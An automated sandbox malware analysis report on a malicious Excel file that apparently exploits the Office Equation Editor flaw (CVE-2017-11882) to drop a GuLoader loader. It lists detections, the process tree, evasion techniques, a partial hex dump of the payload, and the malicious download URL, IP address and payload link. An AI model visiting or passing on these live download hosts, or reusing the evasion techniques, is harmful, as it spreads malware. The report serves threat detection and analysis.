Play interactive tour

Edit tour

Windows Analysis Report ORDER RFQ1009202.xlsx

Overview

General Information

Sample Name:	ORDER RFQ1009202.xlsx
Analysis ID:	483003
MD5:	f60722f1276c17d3730a51d325e38e4f
SHA1:	db5bff43471b8729d3da739d85d156f586fd4ece
SHA256:	065e796cb07c1408bca1859b5ca5fae93d8bd6d145e0a547b9916f226c6d7fa8
Tags:	LokiVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

GuLoader behavior detected

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Hides threads from debuggers

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Stores large binary data to the registry

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Checks if the current process is being debugged

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2012 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2840 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2664 cmdline: 'C:\Users\Public\vbc.exe' MD5: 4399C694E88F3F32D22D91C6C4A173ED)

vbc.exe (PID: 1412 cmdline: 'C:\Users\Public\vbc.exe' MD5: 4399C694E88F3F32D22D91C6C4A173ED)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downloa"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000009.00000002.688116507.00000000001B0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 23.95.85.181, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2840, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49166

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2840, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2840, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2664

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloa"}

Multi AV Scanner detection for submitted file

Show sources

Source: ORDER RFQ1009202.xlsx	Virustotal: Detection: 35%			Perma Link
Source: ORDER RFQ1009202.xlsx	ReversingLabs: Detection: 27%

Antivirus detection for URL or domain

Show sources

Source: http://23.95.85.181/msn/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: http://23.95.85.181/msn/vbc.exe

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 51%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 27%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 27%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: unknown

HTTPS traffic detected: 151.101.65.195:443 -> 192.168.2.22:49165 version: TLS 1.2

Source: global traffic

DNS query: name: ggle.io

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 151.101.65.195:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 151.101.65.195:443

Source: excel.exe

Memory has grown: Private usage: 4MB later: 69MB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=downloa

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Joe Sandbox View	IP Address: 151.101.65.195 151.101.65.195
Source: Joe Sandbox View	IP Address: 151.101.65.195 151.101.65.195

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 14 Sep 2021 17:17:17 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23Last-Modified: Tue, 14 Sep 2021 02:46:53 GMTETag: "12000-5cbeb98214636"Accept-Ranges: bytesContent-Length: 73728Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e0 86 d4 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 f0 00 00 00 30 00 00 00 00 00 00 5c 13 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 01 00 00 10 00 00 01 ee 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 ee 00 00 28 00 00 00 00 20 01 00 f5 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 e3 00 00 00 10 00 00 00 f0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c4 11 00 00 00 00 01 00 00 10 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f5 09 00 00 00 20 01 00 00 10 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /4GZv HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ggle.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msn/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: 23.95.85.181

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.85.181

Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 91D8F771.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91D8F771.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: ggle.io

Source: global traffic	HTTP traffic detected: GET /4GZv HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ggle.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msn/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: 23.95.85.181

Source: unknown

HTTPS traffic detected: 151.101.65.195:443 -> 192.168.2.22:49165 version: TLS 1.2

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040135C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023506C1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354559
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023599A3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355B9A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350DC2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359A38
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354C22
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352615
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352009
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235027E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235607E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235747B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354268
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235286A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235506A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351046
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357C4D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235464E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358CB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352ABC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353AB9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023532AD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354AAC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359A9F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358A83
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351482
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354EF8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023582E1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023550E1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023544E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023512DC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023532C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023504CB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023558CA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352F36
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354932
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359127
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351328
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235312B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235331E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354106
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352D00
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358B0B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350F0A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358376
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353172
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357978
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353B67
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350D57
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357B4F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023511B6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355FB1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02351FBE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023547BA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352FAC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352B94
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353793
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354D92
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358B86
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359B86
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023599E0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023583E3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023507ED
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023591EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358DEA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5B9A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2615
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2009
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9A38
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7C4D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B286A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B506A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4E68
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9A9F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B0886
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2ABC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B32AD
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B04CB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B58CA
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B32C0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B50E1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B331E
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2D00
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2F32
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B312B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7978
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B3172
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2B94
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B1FBE
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2FAC
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B99A3
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B09A0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B9BC2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B07ED
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B99E0

Source: C:\Users\Public\vbc.exe	Code function: 6_2_023594E2 NtProtectVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354559 NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355B9A NtAllocateVirtualMemory,LoadLibraryA,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02350DC2 CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354C22 NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235520E NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355C7F NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235506A NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235464E NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354AAC NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354EF8 NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023550E1 NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023544E2 NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355CEC NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02359531 NtProtectVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354932 NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358376 NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357B4F NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02355B4A NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_023547BA NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353793 NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02354D92 NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5B9A NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5C7F NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B5CEC NtAllocateVirtualMemory,

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: vbc[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write

Source: ORDER RFQ1009202.xlsx	Virustotal: Detection: 35%
Source: ORDER RFQ1009202.xlsx	ReversingLabs: Detection: 27%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$ORDER RFQ1009202.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREDA8.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@6/21@1/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
